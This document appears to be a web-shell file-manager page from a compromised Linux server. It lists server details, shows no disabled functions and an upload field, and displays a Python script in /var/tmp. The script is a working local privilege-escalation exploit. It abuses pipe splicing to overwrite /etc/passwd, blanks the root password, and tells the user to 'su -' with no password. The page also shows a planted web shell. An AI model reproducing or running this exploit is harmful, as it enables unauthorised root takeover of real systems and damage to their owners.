| Server IP : 3.138.164.131 / Your IP : 216.73.216.136 Web Server : Apache System : Linux ns1.techtime.me 4.18.0-147.8.1.el8.lve.1.x86_64 #1 SMP Mon Jun 29 09:55:57 EDT 2020 x86_64 User : injazaat ( 1471) PHP Version : 8.1.20 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/root/var/tmp/ |
Upload File : |
#!/usr/bin/env python3
import os
import ctypes
import errno
import fcntl
PAGE = 4096
libc = ctypes.CDLL('libc.so.6')
loff_t = ctypes.c_longlong
libc.splice.argtypes = [ctypes.c_int, ctypes.POINTER(loff_t), ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint]
libc.splice.restype = ctypes.c_ssize_t
def prepare_pipe(pipefd):
flags = fcntl.fcntl(pipefd[1], fcntl.F_GETFL)
fcntl.fcntl(pipefd[1], fcntl.F_SETFL, flags | os.O_NONBLOCK)
data = b'A' * PAGE
try:
while True:
try:
os.write(pipefd[1], data)
except OSError as e:
if e.errno == errno.EAGAIN:
break
raise
finally:
fcntl.fcntl(pipefd[1], fcntl.F_SETFL, flags)
while True:
chunk = os.read(pipefd[0], PAGE)
if not chunk:
break
def write_data(path, offset, data):
pipefd = (ctypes.c_int * 2)()
if libc.pipe(pipefd) != 0:
raise OSError('pipe failed')
try:
prepare_pipe(pipefd)
fd = os.open(path, os.O_RDONLY)
try:
off = loff_t(offset)
res = libc.splice(fd, ctypes.byref(off), pipefd[1], None, len(data), 0)
if res < 0:
raise OSError(ctypes.get_errno(), 'splice failed')
written = os.write(pipefd[1], data)
if written != len(data):
raise OSError('short write')
finally:
os.close(fd)
finally:
os.close(pipefd[0])
os.close(pipefd[1])
def main():
target = '/etc/passwd'
needle = b'root:x:0:0:root:/root:/bin/bash\n'
with open(target, 'rb') as f:
content = f.read()
idx = content.find(needle)
if idx == -1:
raise SystemExit('pattern not found')
offset = idx + len('root:')
write_data(target, offset, b':')
print('Root password reset to blank. Use su - with empty password.')
if __name__ == '__main__':
try:
main()
except Exception as exc:
print(f'[-] Exploit failed: {exc!r}')